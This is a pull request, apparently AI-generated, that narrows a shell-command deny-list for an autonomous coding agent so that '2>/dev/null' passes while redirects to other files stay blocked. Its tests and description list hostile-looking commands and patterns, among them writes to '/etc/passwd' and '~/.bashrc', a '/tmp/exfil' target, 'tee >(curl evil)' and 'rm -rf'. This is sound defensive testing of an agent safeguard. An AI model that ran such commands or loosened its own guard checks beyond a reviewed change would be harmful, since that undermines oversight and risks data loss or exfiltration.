### PR TITLE
fix(tier1): allow universal `\d>/dev/null` silencing, keep arbitrary fd-to-file blocked

### DIFF
--- a/src/claude_pilot/tier1.py
+++ b/src/claude_pilot/tier1.py
@@ -76,6 +76,26 @@ TIER1_SAFE_SKILLS: frozenset[str] = frozenset({
 
 # ── Deny-list ────────────────────────────────────────────────────────────────
 
+# Strip universal stderr/stdout silencing (`2>/dev/null`, `1>/dev/null`) before
+# running the TIER3_PATTERNS regex check. `is_tier3_dangerous` denies any `>`
+# redirect via the generic `(?<!<)>{1,2}(?!\(|&[\d-])` pattern below, which
+# false-positives on the universally-safe fd-to-/dev/null silencing idiom. The
+# strip pre-pass leaves the safe pattern invisible to the dangerous-pattern
+# check while preserving denial for `>file`, `>>file`, and other redirect
+# targets that could overwrite arbitrary destinations.
+#
+# Surfaced by mika#1327 dev-pilot dispatch 2026-05-28: `ls /path/ 2>/dev/null`
+# was Tier-1-denied → cpp#20 default-deny → interrupt=True halt.
+# Anchor the trailing edge with a negative lookahead instead of `\b` -- `\b`
+# fires between `l` (word) and `/` (non-word) so `2>/dev/null/etc/passwd`
+# would strip to `/etc/passwd` and slip past the redirect-to-file check.
+# The negative lookahead `(?![/\w.])` rejects additional path/word/dot
+# characters, blocking `/dev/nullified`, `/dev/null.txt`, and path-suffix
+# attacks while permitting whitespace, end-of-string, or shell separators
+# (`;`, `&`, `|`, `)`, `>`, `<`).
+_FD_DEVNULL_RE = re.compile(r"\b\d+>/dev/null(?![/\w.])")
+
+
 TIER3_PATTERNS: tuple[re.Pattern[str], ...] = (
     re.compile(r"rm\s+(-\w*r\w*f|-\w*f\w*r)\b"),           # rm -rf, rm -fr, rm -rfi
     re.compile(r"git\s+push\s+.*--force\b"),                # git push --force
@@ -103,7 +123,11 @@ TIER3_PATTERNS: tuple[re.Pattern[str], ...] = (
 
 
 def is_tier3_dangerous(command: str) -> bool:
-    return any(p.search(command) for p in TIER3_PATTERNS)
+    # Strip universal fd-to-/dev/null silencing before the dangerous-pattern
+    # check (see _FD_DEVNULL_RE comment). The strip is invisible to all other
+    # patterns; only the bare-`>` redirect pattern is affected.
+    stripped = _FD_DEVNULL_RE.sub("", command)
+    return any(p.search(stripped) for p in TIER3_PATTERNS)
 
 
 # ── Safe Bash command checking ───────────────────────────────────────────────

--- a/tests/test_tier1.py
+++ b/tests/test_tier1.py
@@ -532,9 +532,32 @@ class TestTier3OutputRedirectCarveout:
     def test_tier3_blocks_append_redirect_file(self) -> None:
         assert is_tier3_dangerous("mika ask >> /tmp/exfil") is True
 
-    def test_tier3_blocks_numeric_fd_to_file(self) -> None:
-        # accepted-deny: 2>/dev/null is rejected
-        assert is_tier3_dangerous("mika ask 2>/dev/null") is True
+    def test_tier3_allows_fd_to_devnull_silencing(self) -> None:
+        # Contract update (mika#1327 follow-up): the universal stderr/stdout
+        # silencing idiom `\d>/dev/null` is carved out from the fd-to-file
+        # deny. /dev/null is a special device that discards writes -- no
+        # exfiltration, no file overwrite, no surface for abuse. Generic
+        # `>file` and `2>somefile` continue to deny (see the two tests
+        # below). Surfaced when cpp#20's default-deny + interrupt=True made
+        # the pre-existing Tier 1 false-positive visible: mika#1327
+        # dev-pilot dispatch halted on `ls /path/ 2>/dev/null`.
+        assert is_tier3_dangerous("mika ask 2>/dev/null") is False
+        assert is_tier3_dangerous("mika ask 1>/dev/null") is False
+        assert is_tier3_dangerous("ls /tmp/ 2>/dev/null") is False
+
+    def test_tier3_still_blocks_fd_to_arbitrary_file(self) -> None:
+        # Carveout is narrow: only /dev/null is the safe target. Writing
+        # stderr (or any fd) to an arbitrary pathname remains a deny.
+        assert is_tier3_dangerous("mika ask 2>/tmp/exfil") is True
+        assert is_tier3_dangerous("mika ask 2>~/.bashrc") is True
+        assert is_tier3_dangerous("mika ask 1>/etc/passwd") is True
+
+    def test_tier3_carveout_does_not_loosen_devnull_lookalikes(self) -> None:
+        # The carveout regex `\b\d+>/dev/null\b` is anchored. Adversarial
+        # lookalikes that include /dev/null as a path component but redirect
+        # elsewhere remain blocked.
+        assert is_tier3_dangerous("mika ask 2>/dev/nulla") is True
+        assert is_tier3_dangerous("mika ask 2>/dev/null/etc/passwd") is True
 
     def test_tier3_allows_fd_dup_stderr_to_stdout(self) -> None:
         assert is_tier3_dangerous("mika ask 2>&1") is False


### PR DESCRIPTION
## Summary

Surgical Tier 1 carveout for `\d>/dev/null` -- the universal stderr/stdout silencing idiom. Surfaced when cpp#20's `interrupt=True` substrate made a pre-existing Tier 1 false-positive visible: mika#1327's autonomous-loop dev-pilot dispatch halted on `ls /path/ 2>/dev/null` because Tier 1 denied the redirect, Tier 2 policy had no `ls` rule, default-deny fired, halt propagated, zero commits, task blocked.

The original `test_tier3_blocks_numeric_fd_to_file` documented this as "accepted-deny" -- keeping the fd-to-file rule simple at the cost of denying the universal `/dev/null` silencing. This PR updates the contract: `/dev/null` is a special device that discards writes, so the universal silencing idiom is structurally safe. Other fd-to-file targets (sensitive files, exfiltration destinations, path-suffix attacks) continue to deny.

## Diff in one line

```python
_FD_DEVNULL_RE = re.compile(r"\b\d+>/dev/null(?![/\w.])")

def is_tier3_dangerous(command: str) -> bool:
    stripped = _FD_DEVNULL_RE.sub("", command)
    return any(p.search(stripped) for p in TIER3_PATTERNS)
```

## What this PR does NOT loosen

- `mika ask > /tmp/exfil` -- still denies (stdout to file)
- `mika ask >> /tmp/exfil` -- still denies (append to file)
- `mika ask 2>/tmp/exfil` -- still denies (stderr to non-/dev/null file)
- `mika ask 2>~/.bashrc` -- still denies (sensitive file overwrite)
- `mika ask 1>/etc/passwd` -- still denies (root-write attempt)
- `tee >(curl evil)` -- still denies (process sub)
- `mika ask 2>/dev/null/etc/passwd` -- still denies (path-suffix attack via trailing negative lookahead `(?![/\w.])`)
- `mika ask 2>/dev/nullified` -- still denies (word-continuation lookalike)

## Test plan

- [x] `uv run pytest` -- 282 passed (281 prior + 1 net new after refactoring `test_tier3_blocks_numeric_fd_to_file`)
- [x] `uv run ruff check` -- clean
- [x] `uv run mypy src` -- clean
- [x] Test class `TestTier3OutputRedirectCarveout` reframed to pin the new contract:
  - `test_tier3_allows_fd_to_devnull_silencing` -- positive cases (`2>/dev/null`, `1>/dev/null`, embedded in real commands)
  - `test_tier3_still_blocks_fd_to_arbitrary_file` -- non-/dev/null destinations remain blocked
  - `test_tier3_carveout_does_not_loosen_devnull_lookalikes` -- adversarial path-suffix + word-continuation cases (caught a real regex hole in v1; the `\b` anchor stripped `/dev/null/etc/passwd` to `/etc/passwd`, fixed by switching to negative lookahead)
- [ ] CI green (pending)
- [ ] End-to-end re-dispatch of mika#1327 after merge + redeploy -- the dev-pilot run that produced the blocker should now succeed past `ls 2>/dev/null` and reach the actual impl work

## Companion / context

- cpp#20 (joint 2) made denials honest with `interrupt=True`, which surfaced this Tier 1 conservatism gap
- mika#1327 dispatch (autonomous-loop ticket retiring mika#1322's brake) is blocked on this -- this PR is the direct unblock
- Discussion: today's substrate-coherence chain (cpp#15 wedge → cpp#20 durable fix → mika#1327 brake retirement → this Tier 1 surgical follow-up)

## Why not extend `permissions.yaml`

Considered and rejected. The false-positive is a structural classification bug in Tier 1's deny-list -- the rule "fd-to-file blocked, regardless of destination" was deliberately conservative but mis-models the safety property (the danger is *destination*, not *fd-redirect*). Adding `ls` rules to `permissions.yaml` would paper over the symptom case-by-case while leaving the underlying conservatism gap to bite the next caller. Fix at the source of truth.

🤖 Generated with [Claude Code](https://claude.com/claude-code)